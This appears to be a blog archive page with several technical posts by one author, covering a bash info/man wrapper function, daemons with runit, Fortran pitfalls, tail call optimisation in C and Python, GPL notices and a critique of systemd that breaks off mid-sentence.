To keep all flexibility without needing to adjust the PATH, let’s make a bash function. That function can go into ~/.bashrc, or /etc/bash/bashrc.1 I chose the latter, because it provides the function for all accounts on the system and keeps it separate from the general setup.

The function will be called i: To get information about any thing, just call i thing.

Let’s implement that:

function i()
{
    INFOVERSIONLINE=$(info --version | head -n 1)
    INFOVERSION="${INFOVERSIONLINE##* }"
    INFOGT5=$(if test ${INFOVERSION%%.*} -gt 5; then echo true; else echo false; fi)
    # start with special cases which are quick to check for
    if test $# -lt 1; then
        # show info help notice
        info --help
    elif test $# -gt 1 && ! echo $1 | grep -q "[0-9]"; then
        # user sent complex request, but not with a section command. Just use info
        info "$@"
    elif test $# -gt 1 && echo $1 | grep -q "[0-9]"; then
        # user sent request for a section from the man pages, we must defer to man
        man "$@"
    elif test x"$1" = x"info"; then
        # for old versions of info, calling info --usage info fails to
        # provide info about calling info
        if test x"$INFOGT5" = x"true"; then
            info --usage info
        else
            info --usage -f info-stnd
        fi
    elif test x"$1" = x"man"; then
        # info --all -w ./man fails to find the man man page
        info man
    else
        # start with a fast but incomplete info lookup
        INFOPAGELOCATION="$(info --all -w ./"$@" | head -n 1)"
        INFOPAGELOCATION_PAGENAME="$(info --all -w "$1".info | head -n 1)"
        INFOPAGELOCATION_COREUTILS="$(info -w coreutils -n "$@")"
        # check for usage from fast info, if that fails check man and
        # if that also fails, just get the regular info page.
        if test x"${INFOPAGELOCATION}" = x"*manpages*" || test x"${INFOPAGELOCATION}" != x""; then
           info "$@"; # use info to read the known page, man or info
        elif test x"${INFOPAGELOCATION_COREUTILS}" != "x" && info -f "${INFOPAGELOCATION_COREUTILS}" -n "$@" | head -n 1 | grep -q -i "$@"; then
            # coreutils utility
            info -f "${INFOPAGELOCATION_COREUTILS}" -n "$@"
        elif test x"${INFOPAGELOCATION}" = x"" && test x"${INFOPAGELOCATION_PAGENAME}" = x""; then
           # unknown to quick search, try slow search or defer to man.
           # TODO: it would be nice if I could avoid this double search.
           if test x"$(info -w "$@")" = x"*manpages*"; then
               info "$@"
           else
               # defer to man, on error search for alternatives
               man "$@" || (echo nothing found, searching info ... && \
                            while echo $1 | grep -q '^[0-9]$'; do shift; done && \
                            info -k "$@" && false)
           fi
        elif test x"${INFOPAGELOCATION_PAGENAME}" != x""; then
             # search for alternatives (but avoid numbers)
           info --usage -f "${INFOPAGELOCATION_PAGENAME}" 2>/dev/null || man "$@" ||\
             (echo searching info &&\
              while echo $1 | grep -q '^[0-9]$'; do shift; done && \
              info -k "$@" && false)            
        else # try to get usage instructions, then try man, then
             # search for alternatives (but avoid numbers)
           info --usage -f "${INFOPAGELOCATION}" 2>/dev/null || man "$@" ||\
             (echo searching info &&\
              while echo $1 | grep -q '^[0-9]$'; do shift; done && \
              info -k "$@" && false)
        fi
        # ensure that unsuccessful requests report an error status
        INFORETURNVALUE=$?
        unset INFOPAGELOCATION
        unset INFOPAGELOCATION_COREUTILS
        if test ${INFORETURNVALUE} -eq 0; then
            unset INFORETURNVALUE
            return 0
        else
            unset INFORETURNVALUE
            return 1
        fi
    fi
}

3 Examples

Let’s see what that gives us.

3.1 First check: Getting info on info:

{{{fun}}}
i info | head
echo ...
Next: Cursor Commands,  Prev: Stand-alone Info,  Up: Top

2 Invoking Info
***************

GNU Info accepts several options to control the initial node or nodes
being viewed, and to specify which directories to search for Info files.
Here is a template showing an invocation of GNU Info from the shell:

     info [OPTION...] [MANUAL] [MENU-OR-INDEX-ITEM...]
...

3.2 Second check: Some random GNU command

{{{fun}}}
i grep | head | sed 's/\[[0-9]*m//g' # stripping simple colors
echo ...
Next: Regular Expressions,  Prev: Introduction,  Up: Top

2 Invoking ‘grep’
*****************

The general synopsis of the ‘grep’ command line is

     grep OPTIONS PATTERN INPUT_FILE_NAMES

There can be zero or more OPTIONS.  PATTERN will only be seen as such
...

Note: If there’s a menu at the bottom, you can jump right to it’s entries by hitting the m key.

3.3 Utility which also exists as libc function

Checking for i stat gives us the stat command:

{{{fun}}}
i stat | head
Next: sync invocation,  Prev: du invocation,  Up: Disk usage

14.3 ‘stat’: Report file or file system status
==============================================

‘stat’ displays information about the specified file(s).  Synopsis:

     stat [OPTION]… [FILE]…

   With no option, ‘stat’ reports all information about the given files.

…while checking for i libc stat gives us the libc function:

{{{fun}}}
i libc stat | head
Next: Testing File Type,  Prev: Attribute Meanings,  Up: File Attributes

14.9.2 Reading the Attributes of a File
---------------------------------------

To examine the attributes of files, use the functions 'stat', 'fstat'
and 'lstat'.  They return the attribute information in a 'struct stat'
object.  All three functions are declared in the header file
'sys/stat.h'.

3.4 Something which only has a man-page

i man cleanly calls info man.

{{{fun}}}
i man | head | sed "s,\x1B\[[0-9;]*[a-zA-Z],,g" # stripping colors
man(1)                      General Commands Manual                     man(1)



NAME
       man  -  Formatieren  und Anzeigen von Seiten des Online-Handbuches (man
       pages)
       manpath - Anzeigen  des  Benutzer-eigenen  Suchpfades  für  Seiten  des
       Online-Handbuches (man pages)

3.5 A request for a man page section

i 2 stat cleanly defers to man 2 stat

{{{fun}}}
i 2 stat | head | sed "s,\x1B\[[0-9;]*[a-zA-Z],,g" # stripping colors
STAT(2)                    Linux Programmer's Manual                   STAT(2)



NAME
       stat, fstat, lstat, fstatat - get file status

SYNOPSIS
       #include <sys/types.h>
       #include <sys/stat.h>

3.6 Something unknown

In case there is no info directly available, do a keyword search and propose sources.

{{{fun}}}
i em | head
echo ...
nothing found, searching info ...
"(emacspeak)Speech System" -- speech system
"(cpio)Copy-pass mode" -- copy files between filesystems
"(tar)Basic tar" -- create, complementary notes
"(tar)problems with exclude" -- exclude, potential problems with
"(tar)Basic tar" -- extract, complementary notes
"(tar)Incremental Dumps" -- extract, using with --listed-incremental
"(tar)Option Summary" -- incremental, summary
"(tar)Incremental Dumps" -- incremental, using with --list
"(tar)Incremental Dumps" -- list, using with --incremental
...

4 Summary

i thing gives you info on some thing. It makes using info just as convenient as using man.

Its usage even beats man in convenience, since it defers to man if needed, offers alternatives and provides named categories instead of having to remember the handbook numbers to find the right function.

And as developer you can use texinfo to provide high quality documentation in many formats. You can even include a comprehensive tutorial in your documentation while still enabling your users to quickly reach the information they need.

We had this all along, except for a few nasty roadblocks. Here I did my best to eliminate these roadblocks.

Footnotes:

1

Or it can go into /etc/bash/bashrc.d/info.sh (if you have a bashrc directory). That is the cleanest option.

AnhangGröße
2016-09-12-Mo-replacing-man-with-info.org10.46 KB

Screencast: Tabbing of everything in KDE

I just discovered tabbing of everything in KDE:

(download)

Created with recordmydesktop, cut with kdenlive, encoded to ogg theora with ffmpeg2theora (encoding command).

Music: Beat into Submission on Public Domain by Tryad.

To embed the video on your own site you can simply use:

<video 
src="http://draketo.de/files/screencast-tabbing-everywhere-kde.ogv"
controls=controls>
</video>

If you do so, please provide a backlink here.

License: cc by-sa, because that’s the license of the song. If you omit the audio, you can also use one of my usual free licenses (or all of them, including the GPL). Here’s the raw recording (=video source).

¹: Feel free to upload the video to youtube or similar. I license my stuff under free licenses to make it easy for everyone to use, change and spread them.

²: Others have shown this before, but I don’t mind that. I just love the feature, so I want to show it :)

³: The command wheel I use for calling programs is the pyRad.

AnhangGröße
screencast-tabbing-everywhere-kde.ogv10.75 MB

Simple daemon with start-stop-daemon and runit

PDF

PDF (to print)

Org (source)

Creating a daemon with almost zero effort.

start-stop-daemon

The example with the start-stop-daemon uses Gentoo OpenRC as root.

The simplest daemon we can create is a while loop:

echo '#!/bin/sh' > whiledaemon.sh
echo 'while true; do true; done' >> whiledaemon.sh
chmod +x whiledaemon.sh

Now we start it as daemon

start-stop-daemon --pidfile whiledaemon.pid \
--make-pidfile --background ./whiledaemon.sh

Top shows that it is running:

top | grep whiledaemon.sh

We stop it using the pidfile:

start-stop-daemon --pidfile whiledaemon.pid \
--stop ./whiledaemon.sh

That’s it.

Hint: To add cgroups support on a Gentoo install, open /etc/rc.conf and uncomment

rc_controller_cgroups="YES"

Then in the initscript you can set the other variables described below that line. Thanks for this hint goes to Luca Barbato!

If you want to ensure that the daemon keeps running without checking a PID file (which might in some corner cases fail because a new process claims the same PID), we can use runsvdir from runit.

daemon with runit

Minimal examples for runit daemons - first as unpriviledged user, then as root.

runit as simple user

Create a script which dies

echo '#!/usr/bin/env python\nfor i in range(100): a = i*i' >/tmp/foo.py
chmod +x /tmp/foo.py

Create the daemon folder

mkdir -p ~/.local/run/runit_services/python
ln -sf /tmp/foo.py ~/.local/run/runit_services/python/run

Run the daemon via runsvdir

runsvdir ~/.local/run/runit_services

Manage it with sv (part of runit)

# stop the running daemon
SVDIR=~/.local/run/runit_services/ sv stop python
# start the service (it shows as `run` in top)
SVDIR=~/.local/run/runit_services/ sv start python

runit as root

Minimal working example for setting up runit as root - like a sysadmin might do it.

echo '#!/usr/bin/env python\nfor i in range(100): a = i*i' >/tmp/foo.py &&
    chmod +x /tmp/foo.py &&
    mkdir -p /run/arne_service/python &&
    printf '#!/bin/sh\nexec /tmp/foo.py' >/run/arne_service/python/run &&
    chmod +x /run/arne_service/python/run &&
    chown -R arne /run/arne_service &&
    su - arne -c 'runsvdir /run/arne_service'

Or without bash indirection (giving up some flexibility we don’t need here)

echo '#!/usr/bin/env python\nfor i in range(100): a = i*i' >/tmp/foo.py && 
    chmod +x /tmp/foo.py &&
    mkdir -p /run/arne_service/python &&
    ln -s /tmp/foo.py /run/arne_service/python/run &&
    chown -R arne /run/arne_service &&
    su - arne -c 'runsvdir /run/arne_service'
AnhangGröße
2015-04-15-Mi-simple-daemon-openrc.org2.92 KB
2015-04-15-Mi-simple-daemon-openrc.pdf152.99 KB

Simple positive trust scheme with threshholds

Update: I nowadays think that voting down is useful, but only for protection against spam and intentional disruption of communication. Essentially a distributed function to report spam.

I don’t see a reason for negative reputation schemes — voting down is in my view a flawed concept.

The rest of this article is written for freetalk inside freenet, and also posted there with my nonanonymous ID.

That just allows for community censorship, which I see as incompatible with the goals of freenet.

Would it be possible to change that to use only positive votes and a threshhold?

  • If I like what some people write, I give them positive votes.
  • If I get too much spam, I increase the threshhold for all people.
  • Effective positive votes get added. It suffices that some people I trust also trust someone else and I’ll see the messages.
  • Effective trust is my trust (0..1) · the trust of the next in the chain (0..1) · …

Usecase:

  • Zwister trusts Alice and Bob.
  • Alice trusts Lilith.
  • Bob hates Lilith.

In the current scheme (as I understand it), zwister wouldn’t see posts from Lilith.

In a pure positive scheme, zwister would see the posts. If zwister wants to avoid seeing the posts from Lilith, he has to untrust Alice or ask Alice to untrust Lilith. Add to that a personal (and not propagating) blocking option which allows me to “never see anything from Lilith again”.

Bob should not be able to interfere with me seeing the messages from Lilith, when Alice trusts Lilith.

If zwisters trust for Alice (0..1) multiplied with Alices trust for Lilith (0..1) is lower than zwisters threshhold, zwister doesn’t see the messages.

PS: somehow adapted from Credence, which would have brought community spam control to Gnutella, if Limewire had adopted it.

PPS: And adaption for news voting: You give positive votes on news which show up. Negative votes assign a private threshhold to the author of the news, so you then only see news from that author which enough people vote for.

Simple steps to attach the GNU Public License (GPL) to your project

Here's the simple steps to attach a GPL license to your source files (written after requests by DiggClone and Bandnet):

For your own project, just add the following text-notice to the header/first section of each of your source-files, commented out in whatever way your language uses:

----------------following is the notice-----------------
/*
* Your Project Name - -you slogan-
* Copyright (C) 2007 - 2007 Your Name
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
----------------------------------------------
the "2007 - 2007" needs to be adjusted to "year when you gave it the license in the first place" - "current year".

Then put the file gpl.txt into the source-folder or a docs folder: http://www.gnu.org/licenses/gpl.txt

If you are developing together with other people, you need their permission to put the project under the GPL.

------

Just for additional Info, I found this license comparision paper by sun: http://mediacast.sun.com/share/webmink/SunLicensingWhitePaper042006.pdf

And comments to it: http://blogs.sun.com/webmink/entry/open_source_licensing_paper#comments

It does look nice, but it misses one point:

GPL is trust: Contributors can trust, that their contributions will keep helping the community, and that the software they contribute to will keep being accessible for the community.

(That's why I decided some years ago to only support GPL projects. My contributions to one semi-closed project got lost, because the project wasn't free and the developer just decided not to offer them anymore, and I could only watch hundreds of hours of work disappear, and that hurt.)

Best wishes,
Arne
PS: If anything's missing, please write a comment!

Some Python Programs of mine

heavily outdated page. See bitbucket.org/ArneBab for many more projects…

Hi,

I created some projects with pyglet and some tools to facilitate 2D
game development (for me), and I though you might be interested.

  • babglet: basic usage of pyglet for 2D games with optional collision
    detection and avoidance.
  • blob_swarm: a swarm of blobs with emerging swarm behaviour through only pair relations.
  • blob_battle: a duel-style battle between two blobs (basic graphics,
    control and movement done)
  • fuzzy_collisions: 2 groups of blobs. One can be controlled. When two
    blobs collide, they move away a (random) bit to avoid the collision.

They are avaible from the rpg-1d6 project on sourceforge:
-> https://sf.net/projects/rpg-1d6/

The download can be found at the sf.net download page:
-> https://sourceforge.net/project/showfiles.php?group_id=199744

Strengths and weaknesses of Python

a reply I wrote on quora.

Python is easy to learn and low ceremony. Both are pretty hard targets to hit. It also has great libraries for scientific work, for system scripting and for web development — and for most everything else. And it is pragmatic in a sense: It gets stuff done. And in a way which others can typically understand easily. Which is an even harder target to hit, especially with low ceremony languages. If you look for reasons, import this aka PEP 20 -- The Zen of Python is a good start.

Python has rightfully been called “Pseudocode which actually runs”. There’s often no need for pseudocode if you can show some Python.

However it has its weaknesses. Many here already talked about performance. I won’t go there, because you can fix most of that with cython, pypy and time (as the javascript engines in Browsers show which often get 50% of the speed of optimized C). What irks me are some limitations in its syntax which I begun to hit more and more about two years ago.

List comprehensions make actual code more complicated than simple examples, because you have kind of a dual syntax to it. And there is some ceremony in tools which were added later. For example this is the template I nowadays use to start a Python project: a minimal Python script — this could be part of the language so that I would not even need to put it into the script. But this is not how history works: It cannot break backwards compatibility (a fate which hits all useful and widespread programming languages). Also things like having to spell out the underscore names feel more and more strange to me. Therefore I started into Guile Scheme to see how different programming could be if I shed the constraints of Python. You can read my journey in py2guile: Going from Python to Guile Scheme - a natural progression (a free ebook).

Also see my other Python-articles on this site.

Surprising behaviour of Fortran (90/95)

1 Introduction

I recently started really learning Fortran (as opposed to just dabbling with existing code until it did what I wanted it to).

Here I document the surprises I found along the way.

If you want a quick start into Fortran, I’d suggest to begin with the tutorial Writing a commandline tool in Fortran and then to come back here to get the corner cases right.

As reference: I come from Python, C++ and Lisp, and I actually started to like Fortran while learning it. So the horror-stories I heard while studying were mostly proven wrong. I uploaded the complete code as base60.f90.

2 Testing Skelleton

This is a code sample for calculating a base60 value from an integer.

The surprises are taken out of the program and marked with double angle brackets («surprise»). They are documented in the chapter Surprises.

program base60
  ! first step: Base60 encode. 
  ! reference: http://faruk.akgul.org/blog/tantek-celiks-newbase60-in-python-and-java/
  ! 5000 should be 1PL
  implicit none
  <<declare-function-type-program>>
  <<function-test-calls>>
end program base60
<<declare-function-type-function>>
  implicit none
  !!! preparation
  <<unchanged-argument>>
  <<parameter>>
  ! work variables
  integer :: n = 0
  integer :: remainder = 0
  ! result
  <<variable-declare-init>>
  ! actual algorithm
  if (number == 0) then
     <<return>>
  end if
  ! calculate the base60 string
  <<variable-reset>>
  n = number ! the input argument: that should be safe to use.
  ! catch number = 0
  do while(n > 0)
     remainder = mod(n, 60)
     n = n/60
     <<indizes-start-at-1>>
     ! write(*,*) number, remainder, n
  end do
<<return-end>>

2.1 Helpers

write(*,*) 0, trim(numtosxg(0))
write(*,*) 100000, trim(numtosxg(100000))
write(*,*) 1, trim(numtosxg(1))
write(*,*) 2, trim(numtosxg(2))
write(*,*) 60, trim(numtosxg(60))
write(*,*) 59, trim(numtosxg(59))

3 Surprises

3.1 I have to declare the return type of a function in the main program and in the function

! I have to declare the return type of the function in the main program, too.
character(len=1000) :: numtosxg
character(len=1000) function numtosxg( number )

Alternatively to declaring the function in its header, I can also declare its return type in the declaration block inside the function body:

function numtosxg (number)
  character(len=1000) :: numtosxg
end function numtosxg

3.2 Variables in Functions accumulate over several function calls

This even happens, when I initialize the variable when I declare it:

character(len=1000) :: res = ""

Due to that I have to begin the algorithm with resetting the required variable.

res = " " ! I have to explicitely set res to " ", otherwise it
          ! accumulates the prior results!

This provides a hint that initialization in a declaration inside a function is purely compile-time.

program accumulate
  implicit none
  integer :: acc
  write(*,*) acc(), acc(), acc() ! prints 1 2 3
end program accumulate

integer function acc()
  implicit none
  integer :: ac = 0
  ac = ac + 1
  acc = ac
end function acc
program accumulate
  implicit none
  integer :: acc
  write(*,*) acc(), acc(), acc() ! prints 1 1 1
end program accumulate

integer function acc()
  implicit none
  integer :: ac
  ac = 0
  ac = ac + 1
  acc = ac
end function acc

3.3 parameter vs. intent(in)

Defining a variable as parameter gives a constant, not an unchanged function argument:

! constants: marked as parameter: not function parameters, but
! algorithm parameters!
character(len=61), parameter :: base60chars = "0123456789"&
     //"ABCDEFGHJKLMNPQRSTUVWXYZ_abcdefghijkmnopqrstuvwxyz"

An argument the function is not allowed to change is defined via intent(in):

! input: ensure that this is purely used as input.
! intent is only useful for function arguments.
integer, intent(in) :: number

3.4 To return values from functions, assign the value to the function itself

This feels surprisingly obvious, but it was surprising to me nontheless.

numtosxg = "0"
return

The return statement is only needed when returning within a function. At the end of the function it is implied.

  numtosxg = res
end function numtosxg

3.5 Fortran array indizes start at 1 - and are inclusive

For an algorithm like the example base60, where 0 is identified by the first character of a string, this requires adding 1 to the index.

! note that fortran indizes start at 1, not at 0.
res = base60chars(remainder+1:remainder+1)//trim(res)

Also note that the indizes are inclusive. The following actually gets the single letter at index n+1:

base60chars(n+1:n+1)

In python on the other hand, the second argument of the array is exclusive, so to get the same result you would use [n:n+1]:

pythonarray[n:n+1]

3.6 I have to trim strings when concatenating

It is necessary to get rid of trailing blanks (whitespace) from the last char to the end of the declared memory space, otherwise there will be huge gaps in combined strings - or you will get missing characters.

program test
  character(len=5) :: res
  write(*,*) res ! undefined. In the last run it gave me null-bytes, but
                 ! that is not guaranteed.
  res = "0"
  write(*,*) res ! 0
  res = trim(res)//"a"
  write(*,*) res ! 0a
  res = res//"a"
  write(*,*) res ! 0a: trailing characters are silently removed.
  ! who else expected to see 0aa?
  write(res, '(a, "a")') trim(res) ! without trim, this gives an error!
                                   ! *happy*
  write(*,*) res
end program test

Hint from Alexey: use trim(adjustl(…)) to get rid of whitespace on the left and the right side of the string. Trim only removes trailing blanks.

Author: Arne Babenhauserheide

Emacs 24.3.1 (Org mode 8.0.2)

AnhangGröße
surprises.org8.42 KB
accumulate.f90226 Bytes
accumulate-not.f90231 Bytes
base60-surprises.f901.6 KB
trim.f90501 Bytes
surprises.pdf206.83 KB
surprises.html22.47 KB
base60.f902.79 KB

Tail Call Optimization (TCO), dependency, broken debug builds in C and C++ — and gcc 4.8

TCO: Reducing the algorithmic complexity of recursion.
Debug build: Add overhead to a program to trace errors.
Debug without TCO: Obliterate any possibility of fixing recursion bugs.

“Never develop with optimizations which the debug mode of the compiler of the future maintainer of your code does not use.”°

UPDATE: GCC 4.8 gives us -Og -foptimize-sibling-calls which generates nice-backtraces, and I had a few quite embarrassing errors in my C - thanks to AKF for the catch!

1 Intro

Tail Call Optimization (TCO) makes this

def foo(n):
    print(n)
    return foo(n+1)
foo(1)

behave like this

def foo(n):
    print(n)
    return n+1
n = 1 while True: n = foo(n)

Table of Contents

I recently told a colleague how neat tail call optimization in scheme is (along with macros, but that is a topic for another day…).

Then I decided to actually test it (being mainly not a schemer but a pythonista - though very impressed by the possibilities of scheme).

So I implemented a very simple recursive function which I could watch to check the Tail Call behaviour. I tested scheme (via guile), python (obviously) and C++ (which proved to provide a surprise).

2 The tests

2.1 Scheme

(define (foo n)
  (display n)
  (newline)
  (foo (1+ n)))

(foo 1)

2.2 Python

def foo(n):
    print n
    return foo(n+1)

foo(1)

2.3 C++

The C++ code needed a bit more work (thanks to AKF for making it less ugly/horrible!):

#include <stdio.h>

int recurse(int n)
{
  printf("%i\n", n);
  return recurse(n+1);
}

int main()
{
  return recurse(1);
}

Additionally to the code I added 4 different ways to build the code: Standard optimization (-O2), Debug (-g), Optimized Debug (-g -O2), and only slightly optimized (-O1).

all : C2 Cg Cg2 C1

# optimized
C2 : tailcallc.c
    g++ -O2 tailcallc.c -o C2

# debug build
Cg : tailcallc.c
    g++ -g tailcallc.c -o Cg

# optimized debug build
Cg2 : tailcallc.c
    g++ -g -O2 tailcallc.c -o Cg2

# only slightly optimized
C1 : tailcallc.c
    g++ -O1 tailcallc.c -o C1

3 The results

So now, let’s actually check the results. Since I’m interested in tail call optimization, I check the memory consumption of each run. If we have proper tail call optimization, the required memory will stay the same over time, if not, the function stack will get bigger and bigger till the program crashes.

3.1 Scheme

Scheme gives the obvious result. It starts counting numbers and keeps doing so. After 10 seconds it’s at 1.6 million, consuming 1.7 MiB of memory - and never changing the memory consumption.

3.2 Python

Python is no surprise either: it counts to 999 and then dies with the following traceback:

Traceback (most recent call last):
 File "tailcallpython.py", line 6, in <module>
   foo(1)
 File "tailcallpython.py", line 4, in foo
   return foo(n+1)
… repeat about 997 times …
RuntimeError: maximum recursion depth exceeded

Python has an arbitrary limit on recursion which keeps people from using tail calls in algorithms.

3.3 C/C++

C/C++ is a bit trickier.

First let’s see the results for the optimized run:

3.3.1 Optimized

g++ -O2 C.c -o C2
./C2

Interestingly that runs just like the scheme one: After 10s it’s at 800,000 and consumes just 144KiB of memory. And that memory consumption stays stable.

3.3.2 Debug

So, cool! C/C++ has tail call optimization. Let’s write much recursive tail call using code!

Or so I thought. Then I did the debug run.

g++ -g C.c -o Cg
./Cg 

It starts counting just like the optimized version. Then, after about 5 seconds and counting to about 260,000, it dies with a segmentation fault.

And here’s a capture of its memory consumption while it was still running (thanks to KDEs process monitor):

Private

7228 KB   [stack]
56 KB [heap]
40 KB /usr/lib64/gcc/x86_64-pc-linux-gnu/4.7.2/libstdc++.so.6.0.17
24 KB /lib64/libc-2.15.so
12 KB /home/arne/.emacs.d/private/journal/Cg

Shared

352 KB    /usr/lib64/gcc/x86_64-pc-linux-gnu/4.7.2/libstdc++.so.6.0.17
252 KB    /lib64/libc-2.15.so
108 KB    /lib64/ld-2.15.so
60 KB /lib64/libm-2.15.so
16 KB /usr/lib64/gcc/x86_64-pc-linux-gnu/4.7.2/libgcc_s.so.1

That’s 7 MiB after less than 5 seconds runtime - all of it in the stack, since that has to remember all the recursive function calls when there is no tail call optimization.

So we now have a program which runs just fine when optimized but dies almost instantly when run in debug mode.

But at least we have nice gdb traces for the start:
recurse (n=43) at C.c:5
5         printf("%i\n", n);
43
6         return recurse(n+1);

3.4 Optimized debug build

So, is all lost? Luckily not: We can actually specify optimization with debugging information.

g++ -g -O2 C.c -o Cg2
./Cg2

When doing so, the optimized debug build chugs along just like the optimized build without debugging information. At least that’s true for GCC.

But our debug trace now looks like this:
5         printf("%i\n", n);
printf (__fmt=0x40069c "%i\n") at /usr/include/bits/stdio2.h:105
105       return __printf_chk (__USE_FORTIFY_LEVEL - 1, __fmt, __va_arg_pack ());
5
6         return recurse(n+1);
That’s not so nice, but at least we can debug with tail call optimization. We can also improve on this (thanks to AKF for that hint!): We just need to enable tail call optimization separately:
g++ -g -O1 -foptimize-sibling-calls C.c -o Cgtco
./Cg 
But this still gives ugly backtraces (if I leave out -O1, it does not do TCO). So let’s turn to GCC 4.8 and use -Og.
g++ -g -Og -foptimize-sibling-calls C.c -o Cgtco
./Cgtco 
And we have nice backtraces!
recurse (n=n@entry=1) at C.c:4
4       {
5         printf("%i\n", n);
1
6         return recurse(n+1);
5         printf("%i\n", n);
2
6         return recurse(n+1);

3.5 Optimized for size

Can we invert the question? Is all well, now?

Actually not…

If we activate minor optimization, we get the same unoptimized behaviour again.

g++ -O1 C.c -o C1
./C1

It counts to about 260,000 and then dies from a stack overflow. And that is pretty bad™, because it means that a programmer cannot trust his code to work when he does not know all the optimization strategies which will be used with his code.

And he has no way to define in his code, that it requires TCO to work.

4 Summary

Tail Call Optimization (TCO) turns an operation with a memory requirement of O(N)1 into one with a memory requirement of O(1).

It is a nice tool to reduce the complexity of code, but it is only safe in languages which explicitely require tail call optimization - like Scheme.

And from this we can find a conclusion for compilers:

C/C++ compilers should always use tail call optimization, including debug builds, because otherwise C/C++ programmers should never use that feature, because it can make it impossible to use certain optimization settings in any code which includes their code.

And as a finishing note, I’d like to quote (very loosely) what my colleague told me from some of his real-life debugging experience:

“We run our project on an AIX ibm-supercomputer. We had spotted a problem in optimized runs, so we activated the debugger to trace the bug. But when we activated debug flags, a host of new problems appeared which were not present in optimized runs. We tried to isolate the problems, but they only appeared if we ran the full project. When we told the IBM coders about that, they asked us to provide a simple testcase… The problems likely happened due to some crazy optimizations - in our code or in the compiler.”

So the problem of undebuggable code due to a dependency of the program on optimization changes is not limited to tail call optimization. But TCO is a really nice way to show it :)

Let’s use that to make the statement above more general:

C/C++ compilers should always do those kinds of optimizations which lead to changes in the algorithmic cost of programs.

Or from a pessimistic side:

You should only rely on language features, which are also available in debug mode - and you should never develop your program with optimization turned on.

And by that measure, C/C++ does not have Tail Call Optimization - at least until all mainstream compilers include TCO in their default options. Which is a pretty bleak result after the excitement I felt when I realized that optimizations can actually give C/C++ code the behavior of Tail Call Optimization.

Never develop with optimizations which the debug mode of the compiler of the future maintainer of your code does not use.ABNever develop with optimizations which are not required by the language standard.

Note, though, that GCC 4.8 added the -Og option, which improves the debugging a lot (Phoronix wrote about plans for that last september). It still does not include -foptimize-sibling-calls in -Og, but that might be only a matter of time… I hope it is.

Footnotes:

1 : O(1) and O(N) describe the algorithmic cost of an algorithm. If it is O(N), then the cost rises linearly with the size of the problem (N is the size, for example printing 20,000 consecutive numbers). If it is O(1), the cost is stable regardless of the size of the problem.

Top 5 systemd troubles - a strategic view for distros

systemd is a new way to start a Linux-system with the expressed goal of rethinking all of init. These are my top 5 gripes with it. (»skip the updates«)

Update (2019): I now use GNU Guix with shepherd. That’s one more better option than systemd. In that it joins OpenRC and many others.

Update (2016-09-28): Systemd is an exploit kit just waiting to be activated. And once it is active, only those who wrote it will be able to defuse it — and check whether it is defused. And it is starting: How to crash systemd in one tweet? Alternatives? Use OpenRC for system services. That’s simple and fast and full-featured with minimal fuss. Use runit for process supervision of user-services and system-services alike.

Update (2014-12-11): One more deconstruction of the strategies around systemd: systemd: Assumptions, Bullying, Consent. It shows that the attitude which forms the root of the dangers of systemd is even visible in its very source code.

Update (2014-11-19): The Debian General Resolution resulted in “We do not need a general resolution to decide systemd”. The vote page provides detailed results and statistics. Ian Jackson resigned from the Technical Committee: “And, speaking personally, I am exhausted.”

Update (2014-10-16): There is now a vote on a General Resolution in Debian for preserving the ability to switch init systems. It is linked under “Are there better solutions […]?” on the site Shall we fork Debian™? :^|.

Update (2014-10-07): Lennart hetzt (german) describes the rhetoric tricks used by Lennart Poettering to make people forget that he is a major part of the communication problems we’re facing at times - and to hide valid technical, practical, pragmatical, political und strategical criticism of Systemd.

Update (2014-09-24): boycott systemd calls for action with 12 reasons against systemd: “We do recognize the need for a new init system in the 21st century, but systemd is not it.”

Update (2014-04-03): And now we have Julian Assange warning about NSA control over Debian, Theodore Ts’o, maintainer of ext4, complaining about incomprehensible systemd, and Linus Torvalds (you know him, right?) rant against disrupting behavior from systemd developers, going as far as refusing to merge anything from the developers in question into Linux. Should I say “I said so”? Maybe not. After all, I came pretty late. Others saw this trend 2 years before I even knew about systemd. Can we really assume that there won’t be intentional disruption? Maybe I should look for solutions. It could be a good idea to start having community-paid developers.

Update (2014-02-18): An email to the mailing list of the technical committee of debian summarized the strategic implications of systemd-adoption for Debian and RedHat. It was called conspiracy theory right away, but the gains for RedHat are obvious: RedHat would be dumb not to try this. And only a fool trusts a company. Even the best company has to put money before ethics.

Update (2013-11-20): Further reading shows that people have been giving arguments from my list since 2011, and they got answers in the range of “anything short of systemd is dumb”, “this cannot work” (while OpenRC clearly shows that it works well), requests for implementation details without justification and insults and further insults; but the arguments stayed valid for the last 2 years. That does not look like systemd has a friendly community - or is healthy for distributions adopting it. Also an OpenRC developer wrote the best rebuttal of systemd propaganda I read so far: “Alternativlos”: Systemd propaganda (note, though, that I am biased against systemd due to problems I had in the past with udev kernel-dependencies)

  • Losing Control: systemd does so many crucial things itself that the developers of distributions lose their control over the init process: If systemd developers decide to change something, the distributions might actually have to fork systemd and keep the fork up-to-date, and this requires rare skills and lots of resources (due to the pace of systemd). See the Gentoo eudev-Project for a case where this had to happen so the distribution could keep providing features its users rely on. Systemd nowadays incorporates udev. Go reason how systemd devs will act.1 Why losing control is a bad idea: Strategy Letter V: Commodities

  • No scripts (as if you can know beforehand all the things the init system will need to do in each distribution). Nowadays any system should be user-extendable to avoid bottlenecks for development. This essentially boils down to providing a scripting language. Using the language which almost every system administrator knows is a very sane choice for that - and means making it possible to use Shell-Scripts to extend the init-system. Scripts mean that the distribution will never be in a position where it is blocked because it absolutely can’t provide a given fringe feature. And as the experiment with paludis in Gentoo shows, an implementation in C isn’t magically faster than one in a scripting language and can actually be much slower (just compare paludis to pkgcore), because the execution time of the language only very rarely is the real bottleneck - and you can easily shell out that part to a faster language with negligible time loss,2 especially in shell-scripts (pun partially intended). While systemd can be told to run a shell script, this requires a mental context switch and the script cannot tie into all the machinery inside systemd. If there’s a bug in systemd, you need to fix systemd, if you need more than systemd provides out of the box, you need either a script or you have to patch systemd, and otherwise you write in a completely different language (so most people won’t have the skills to go beyond the fences of the ground defined by the systemd developers as proper for users). Why killing scripts is a bad idea: Bloatware and the 80/20 